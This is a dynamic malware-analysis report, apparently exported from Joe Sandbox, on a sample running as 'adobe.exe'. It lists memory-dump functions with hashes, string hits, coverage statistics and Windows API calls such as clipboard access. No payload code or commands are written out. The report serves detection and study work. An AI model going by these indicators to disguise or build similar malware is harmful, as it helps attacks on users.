Opcode ID: 0c166b0590845a7f6683cce1f4d71b233d1727f7ac910ca648a4c936a43ee36a
Instruction ID: dd86c08c98dd81bea88f2555f2a5b3bb295cb2083d21a12f88468ca8a9a9cebf
Opcode Fuzzy Hash: 0c166b0590845a7f6683cce1f4d71b233d1727f7ac910ca648a4c936a43ee36a
Instruction Fuzzy Hash: 10E01D76804118DBC750CBF4DA457AD7BF19B45211F1046DBD41597550F9314611DB41

Function 08AABC28 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b2eb44071e130173a1bd7755e90cf7feb6dd4343b2d7839e6eefb57d624fd00
Instruction ID: e972100be5d34dc24829a0b04df69758d1da1f2a469def305adf8e91051b75dd
Opcode Fuzzy Hash: 7b2eb44071e130173a1bd7755e90cf7feb6dd4343b2d7839e6eefb57d624fd00
Instruction Fuzzy Hash: 71D0A771C0420CFF8B00DFE4850099EB7F9DB4910074008E5850697610EE324A0157E1

Function 08AA2E60 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a766f35bbb6d47b3da0ab61fcf0d98f06f940107d5806b4ba344570753ae839
Instruction ID: 838056c66deaf80b6e93e8c66fded2eff5cff97301db46cf57f047432c5faa4b
Opcode Fuzzy Hash: 7a766f35bbb6d47b3da0ab61fcf0d98f06f940107d5806b4ba344570753ae839
Instruction Fuzzy Hash: A0D0A77180010CEFCB10CFE0C9009AEBFF9DB48200B1044E6E80AD3210FE314A10DB91

Function 08AAA471 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9e04952bd902803c3608b480cd6ec5f24a5b6e16035574d992737705777c51a
Instruction ID: 05f97a39e61c0253387e88fecc9edeef844a7ce3d0be5ad2ebd8ccc9763dac67
Opcode Fuzzy Hash: e9e04952bd902803c3608b480cd6ec5f24a5b6e16035574d992737705777c51a
Instruction Fuzzy Hash: A2D0123A0091C09EDB232B305C258E17FB0EF2B11431D48C7E0C04787386045956C766

Function 08AABEF0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22f4f5a9354d514e612bc1fe8ba868c104e94b75299888460666e2c073ef4329
Instruction ID: 07b5042028f6be5be9b1c90e61d88afdb5a10329bdee4e3fd141c0b7f836868e
Opcode Fuzzy Hash: 22f4f5a9354d514e612bc1fe8ba868c104e94b75299888460666e2c073ef4329
Instruction Fuzzy Hash: 79D05E7560C252DFC301CF84EA60845FBE1EBCA710B14888EE4409B256C722CC1BCB76

Function 08AA4FE0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41405cf0d9900f0eed754cfe140ef38eeb07a3b9ceb2964a9b65a3a2fd3a7cbc
Instruction ID: fe092441917e28e9fec593cb07dfe3af3071145bc1b50f95dd892612cfd8eeaf
Opcode Fuzzy Hash: 41405cf0d9900f0eed754cfe140ef38eeb07a3b9ceb2964a9b65a3a2fd3a7cbc
Instruction Fuzzy Hash: FEC04CB6B4000197C748DAE8DC51F55A3969BE8214F28CD6BA809C7355EA26DD43C648

Function 08AABF00 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2

Function 08AA4CF3 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 382d99bc5ab101b81cdbc2431b30c2efd7663cff2c301fa01884ffa26e053761
Instruction ID: a017c60bc8ae8a5621851825cff9af6ece79a792463b2672fed4ede586ea62d2
Opcode Fuzzy Hash: 382d99bc5ab101b81cdbc2431b30c2efd7663cff2c301fa01884ffa26e053761
Instruction Fuzzy Hash: BCC04C6134144057C749D51CDC52B14A7E69BC8205F5CC4786419C7395EE2ADC039604

Function 08AA411B Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2504ef0549b848ced075f485438108e87368b5c6bc3874f92d8a06bbca8a0ea4
Instruction ID: 020fbe92ef4c9278b39077857cec1b9bf7251fb43cb70c488a1364dee6e6926e
Opcode Fuzzy Hash: 2504ef0549b848ced075f485438108e87368b5c6bc3874f92d8a06bbca8a0ea4
Instruction Fuzzy Hash: 37D012315146008EC341EA68C991848F770EFD1200B04C55FE4959B214EF31D54ADB41

Function 08AAECA0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c88a708d0fe90579e17aa11bd0ff53d25954ecff6cc0ed970d9476ea2dbb27d8
Instruction ID: bc6a773f94ed39e95bd3662cff681c49d34b7903a04001a8a0822f72ec48466b
Opcode Fuzzy Hash: c88a708d0fe90579e17aa11bd0ff53d25954ecff6cc0ed970d9476ea2dbb27d8
Instruction Fuzzy Hash: FEC08C3111260887C2002BE6B40EF247FA86704206F409018B20842C514FB41450CFD2

Function 08AACFFF Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd4a921b5bdbb018e8676dcd94790cb3018b4a2f7757867f3bfed2f9ffa8e249
Instruction ID: 3ee87cda7ac08ce6747a8324fd7e074f287b595188e07ecef90828225cb99f47
Opcode Fuzzy Hash: dd4a921b5bdbb018e8676dcd94790cb3018b4a2f7757867f3bfed2f9ffa8e249
Instruction Fuzzy Hash: 95D012A840D3C1AFD3838B20CCA4144BFA08F83110B6A84CEC0C4CF2A7CA2A9847DB13

Function 08AA8A5F Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecc0459cf77e50bb3d4905373fa67fe0e4347812ce926e4b43fa4974f468d118
Instruction ID: 1d2b4385b635788fac6c6b99e1da4f182f60e98fedaaf7a71d28fe6ed2a5d143
Opcode Fuzzy Hash: ecc0459cf77e50bb3d4905373fa67fe0e4347812ce926e4b43fa4974f468d118
Instruction Fuzzy Hash: E8C01230C0D308CFC7208BA0C4216AC7F74AB0E602B20402AD063A3A13C7280800CF02

Function 08AA46A8 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95df82e4d9ea2fab896ab2d5f4cd9401526f9b73f8b579ece35188fd18935b65
Instruction ID: f549a0f9c77a42a91c064ede539c57ff2d9493525a212d846f405f0d9ea5e047
Opcode Fuzzy Hash: 95df82e4d9ea2fab896ab2d5f4cd9401526f9b73f8b579ece35188fd18935b65
Instruction Fuzzy Hash: 1AC04C390560059B8B41B7548A84D65BAE5FF99B057858852F14547834C721D918DB15

Function 08AAA798 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7df95b3b6378d78929af084b7c5045bbf7f31fc23d3d8dbd93fd2b53839db375
Instruction ID: 11544bd01081f2e05032c020985375bf032f7c5820dfb8d235a8693d209e8fce
Opcode Fuzzy Hash: 7df95b3b6378d78929af084b7c5045bbf7f31fc23d3d8dbd93fd2b53839db375
Instruction Fuzzy Hash: 56B0223A0C0200A08A0033208A80F2EE020EFA0F00FC08C00F38800C208320C8B2CA2F

Function 08AA89EE Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70030fba908d13a062f97a5876fdb96d9ac80bd3598e36bd44a90c2e89c588c4
Instruction ID: 49b99a068f1bb1e58b52560609cd1e8d9048e98c4d678a32dfa84ebc4355865c
Opcode Fuzzy Hash: 70030fba908d13a062f97a5876fdb96d9ac80bd3598e36bd44a90c2e89c588c4
Instruction Fuzzy Hash: DBC04874D08208CBCB648BA0D464AADBBB4EB0D612B20912AE027A3A12DB281840CF40

Function 08AACE6B Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bfa10551fa780b8079d86f69995faa5b5f08e759d55af4c2eda71883ec10b27
Instruction ID: 77e4e99a053e6bea98aa70cabe24abb04b426529233fd04467ba5eba9f0ae981
Opcode Fuzzy Hash: 8bfa10551fa780b8079d86f69995faa5b5f08e759d55af4c2eda71883ec10b27
Instruction Fuzzy Hash: 92B09234A09219CFDB10DF04C990AEDB3B9FB54610F04C880880F675669A30EE448B40

Function 08AA8140 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 08AA4D5B Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5660df5bcb40be5bdcae5358873d2b05eb7df75e0a87682ba1b47114d51b3d86
Instruction ID: 26a2ef16a48a5d664e3a23c019c6368a7d4676139815a4e201273350ace2ea2f
Opcode Fuzzy Hash: 5660df5bcb40be5bdcae5358873d2b05eb7df75e0a87682ba1b47114d51b3d86
Instruction Fuzzy Hash: 62A001B96410009B9644DA94CD92915B762EB85259768C899A8298B366CB23ED139A80

Analysis Process: adobe.exePID: 5852, Parent PID: 3312COMMON

Execution Graph

Execution Coverage:	11.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	157
Total number of Limit Nodes:	21

Executed Functions

Function 06DF2750 Relevance: 9.0, Strings: 6, Instructions: 1490COMMON

Download Yara Rule

Strings

$kq, xrefs: 06DF3B40
$kq, xrefs: 06DF3B70
$kq, xrefs: 06DF3B23
$kq, xrefs: 06DF3B64
$kq, xrefs: 06DF3B17
$kq, xrefs: 06DF3B4C

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq$$kq$$kq
API String ID: 0-1342094364
Opcode ID: d023294d747ec131ea5470d89e211b6292457eb689f43488dd0890ec71945829
Instruction ID: 16d1a717ec00faf8fa5680b735935517a5e73c53abcf66d439b5a345d8c656f9
Opcode Fuzzy Hash: d023294d747ec131ea5470d89e211b6292457eb689f43488dd0890ec71945829
Instruction Fuzzy Hash: 05D26B34E102058FCB64DFA8C584A9DB7F2FF89310F668569D509AB365DB34ED85CB80

Function 06DFB1A8 Relevance: 8.3, Strings: 6, Instructions: 773COMMON

Download Yara Rule

Strings

$kq, xrefs: 06DFBB1F
$kq, xrefs: 06DFBB5F
$kq, xrefs: 06DFBAEB
$kq, xrefs: 06DFBAF7
$kq, xrefs: 06DFBB2B
$kq, xrefs: 06DFBB53

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq$$kq$$kq
API String ID: 0-1342094364
Opcode ID: ff5f99f9fefb1a99c659dd9b6233e1e8b04e1aa4615b024523d3f1f47464f71c
Instruction ID: b8ffff3ea1dc1545042d3257d5a3d997f53d04a502775ec68448e3a8db21b062
Opcode Fuzzy Hash: ff5f99f9fefb1a99c659dd9b6233e1e8b04e1aa4615b024523d3f1f47464f71c
Instruction Fuzzy Hash: 25529130E202098FDF64DB68D5907AEB7F6FB89310F25882AD505DB395DA35DC81CB91

Function 06DF7CF8 Relevance: 3.0, Strings: 2, Instructions: 480
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$kq, xrefs: 06DF8041
$kq, xrefs: 06DF8035

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID: $kq$$kq
API String ID: 0-3550614674
Opcode ID: 5e50384821d86043b6fd12bdb6dd5df40193569a0647300be8b9b04f2b194246
Instruction ID: 71b7c4f02b48b42c930fc300e3acbe22e4c1f00d65c8b36b092cc880471500d6
Opcode Fuzzy Hash: 5e50384821d86043b6fd12bdb6dd5df40193569a0647300be8b9b04f2b194246
Instruction Fuzzy Hash: 0D02CF30B102159FDB64DB69D940AAEB7F6FF88300F158468E506DB399DB35EC86CB90

Function 06DF6560 Relevance: .8, Instructions: 819COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27bb64609295ebde30fd9acbf4932c7b667e2eb60bb1e976bbad4565480086a4
Instruction ID: 512846f47a8ea83bd4faeab97fe244f3f26c70da8f3522f076bad0575973f4e5
Opcode Fuzzy Hash: 27bb64609295ebde30fd9acbf4932c7b667e2eb60bb1e976bbad4565480086a4
Instruction Fuzzy Hash: 8A62DE30B102549FDB54DB68D584BAEB7F2EF88304F258469E606EB794DB35ED81CB80

Function 06DFC0F8 Relevance: .6, Instructions: 648COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5e96d7a2b6e568be9923c13b1ae7192eb78fee3a9c5ed078e0cb25427513a21
Instruction ID: cf3a0ec3d258de746cafbbedebff265ec31e60b5303de535b25bf1a02d587ed7
Opcode Fuzzy Hash: f5e96d7a2b6e568be9923c13b1ae7192eb78fee3a9c5ed078e0cb25427513a21
Instruction Fuzzy Hash: 0F32A034B202098FDB54DB68D990BAEB7B6FB88310F118529E505EB395DB35EC91CB90

Function 06DF5550 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e57c2af8fd66d46b27726f406d87e7bd65aa07116254850c83dc4427a5d7a7d
Instruction ID: f6ce7e44c8e66063bd55c5668462f2540e0936d54c2f80f5bc100866fb8485f1
Opcode Fuzzy Hash: 0e57c2af8fd66d46b27726f406d87e7bd65aa07116254850c83dc4427a5d7a7d
Instruction Fuzzy Hash: 9D120431F202149FDF24DB64E9807AEB7B6EF95310F158469DA56DB384DA34EC41CB90

Function 06DFAC40 Relevance: 10.4, Strings: 8, Instructions: 395
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$kq, xrefs: 06DFADB4
$kq, xrefs: 06DFAD6D
$kq, xrefs: 06DFADEF
$kq, xrefs: 06DFAE18
$kq, xrefs: 06DFADE3
$kq, xrefs: 06DFAD61
$kq, xrefs: 06DFAE0C
$kq, xrefs: 06DFADC0

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
API String ID: 0-1078448309
Opcode ID: c069f4e3916e1311c1370e7b43459011b569a2d5e75658a5e698a6fa3d44b1cc
Instruction ID: 2a5d9f1b2b5d3f338cd142be20aa281bcb467f8c2d7429bdcc7f87fb6fe1dec0
Opcode Fuzzy Hash: c069f4e3916e1311c1370e7b43459011b569a2d5e75658a5e698a6fa3d44b1cc
Instruction Fuzzy Hash: 78E17D34F2020ACFDB65DB69D9806AEB7B6EF84300F258529D509DB354DB34EC85CB90

Function 06DF90C8 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$kq, xrefs: 06DF911B
$kq, xrefs: 06DF914A
$kq, xrefs: 06DF9156
$kq, xrefs: 06DF910F

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq$$kq
API String ID: 0-2881790790
Opcode ID: 9cce9ed9dff5a60cadd26fd157670ae035c0eb9c4d8a21a57a13fdd698501b6e
Instruction ID: c34498cc3d45667dc4b3c41b0b0b5cefabee8375f98adf2607be409ca583cf1f
Opcode Fuzzy Hash: 9cce9ed9dff5a60cadd26fd157670ae035c0eb9c4d8a21a57a13fdd698501b6e
Instruction Fuzzy Hash: 7F914F74F1021A8FDB64DF65D9607AE73FAEF88240F108569C50A9B398EE35EC418B90

Function 06DFCEC8 Relevance: 4.6, Strings: 3, Instructions: 801
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$kq, xrefs: 06DFD2D3
$kq, xrefs: 06DFD2C7
$kq, xrefs: 06DFD2BF

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID: $kq$$kq$$kq
API String ID: 0-2086306503
Opcode ID: e5f6c7a33b5202791a633e02e7c481c26094b280f300a777f7147f18782e047c
Instruction ID: dbccfc7e254e9a086f49d4f89450003e410fc973b3d8e7b8c335e8e0483af9fa
Opcode Fuzzy Hash: e5f6c7a33b5202791a633e02e7c481c26094b280f300a777f7147f18782e047c
Instruction Fuzzy Hash: 7E625E30B102068FCB55DF69E694A5EB7F2FF84304B218A69D0059F369DB75ED86CB80

Function 06DF4B18 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Opq, xrefs: 06DF4CCF
XPpq, xrefs: 06DF4C45
fpq, xrefs: 06DF5225

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID: fpq$XPpq$\Opq
API String ID: 0-2571271785
Opcode ID: 3cf54a4a217a13ea7e354a4b4b2a36f9105eeb029fccf4169f544ea3b066f4fa
Instruction ID: 5928a5ea2509ded8e8c4dd1337ecc188f3d5ed938638f5d79e7664fe848b9a2c
Opcode Fuzzy Hash: 3cf54a4a217a13ea7e354a4b4b2a36f9105eeb029fccf4169f544ea3b066f4fa
Instruction Fuzzy Hash: E9618070F102199FEB54DBB9D8547AEBAF6FF88300F208429D606AB395DE758C458B90

Function 06DF90B9 Relevance: 2.7, Strings: 2, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$kq, xrefs: 06DF914A
$kq, xrefs: 06DF910F

Memory Dump Source

Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd

Similarity

API ID:
String ID: $kq$$kq
API String ID: 0-3550614674
Opcode ID: f33b66952c4d5fbdb5dbf9d534e84b39d6734bf8933209d8f43c73daba78127f
Instruction ID: 6a6676af8573bf6c19cf9ddf8adc81086cfdd2115ed871d52d1c9131585a860c
Opcode Fuzzy Hash: f33b66952c4d5fbdb5dbf9d534e84b39d6734bf8933209d8f43c73daba78127f
Instruction Fuzzy Hash: E8512B74F101058FDB54DB75D960BAF73FAEBC8640F508569C90A9B398EE35EC028BA0

Function 016CED30 Relevance: 1.6, APIs: 1, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.4115373441.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16c0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d752365bfd530e49377c4c51d8095572048b002b9e16ba648eb33a1a38d458bd
Instruction ID: ba24ea68e620f2067cb31d8151a79601986d1536aaf50da15a57f35282c9eed0
Opcode Fuzzy Hash: d752365bfd530e49377c4c51d8095572048b002b9e16ba648eb33a1a38d458bd
Instruction Fuzzy Hash: 21412372E043958FC714DF69D8142AABFF1EF8A310F1585AAD544E7392DB349844CBE1

Function 06DE29F3 Relevance: 1.6, APIs: 1, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06DE2B0A

Memory Dump Source

Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 320ed1824a1f25227efb52eae5f5dab32c3ca8e74078fd3386713cb4b14299ca
Instruction ID: c429c29acaefe90b0e08f7e3281bb265052d76fae124c28ddf65b308338e9cf5
Opcode Fuzzy Hash: 320ed1824a1f25227efb52eae5f5dab32c3ca8e74078fd3386713cb4b14299ca
Instruction Fuzzy Hash: 5051DFB1D00309DFDB14CF9AC884ADEBBB5BF48310F24852AE819AB214D770A985CF90

Function 06DE29F8 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06DE2B0A

Memory Dump Source

Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 264b2be8770058cf41befd94f6aaf7279cfcd8fef3bae04a1e1e5fdb8c913699
Instruction ID: b304efc20ad44ed38d0a05a6c927bdd2d906c27594bce65ae18df42dae08f2e6
Opcode Fuzzy Hash: 264b2be8770058cf41befd94f6aaf7279cfcd8fef3bae04a1e1e5fdb8c913699
Instruction Fuzzy Hash: 2341CDB1D00309DFDB14DF9AC984ADEBBB5FF48310F24852AE819AB214D774A985CF94

Function 06DE6464 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 06DE7849

Memory Dump Source

Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: a0273409d9eb205401eb4e4bebff4b84ed1591ad735f64cf3edf2ad57452dabb
Instruction ID: c064f631aeb97ddba02e79c798b26d2f5460d314177e98b0ee5928f00af307d4
Opcode Fuzzy Hash: a0273409d9eb205401eb4e4bebff4b84ed1591ad735f64cf3edf2ad57452dabb
Instruction Fuzzy Hash: 494127B4D00345CFDB94DF99C888AAABBF5FB98314F24C459D559AB321D374A841CFA0

Function 06DE84CC Relevance: 1.6, APIs: 1, Instructions: 74
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 06DE8560

Memory Dump Source

Source File: 00000004.00000002.4147407094.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6de0000_adobe.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 71429a63bb7b7551b77f088a29a1818daa51d2a4b41ea21c8dfb4aed7fbd1833
Instruction ID: 08968326ef0fb0c24e90de9db2e197fe17f875f77760ee41129bbaf570a55ec0
Opcode Fuzzy Hash: 71429a63bb7b7551b77f088a29a1818daa51d2a4b41ea21c8dfb4aed7fbd1833
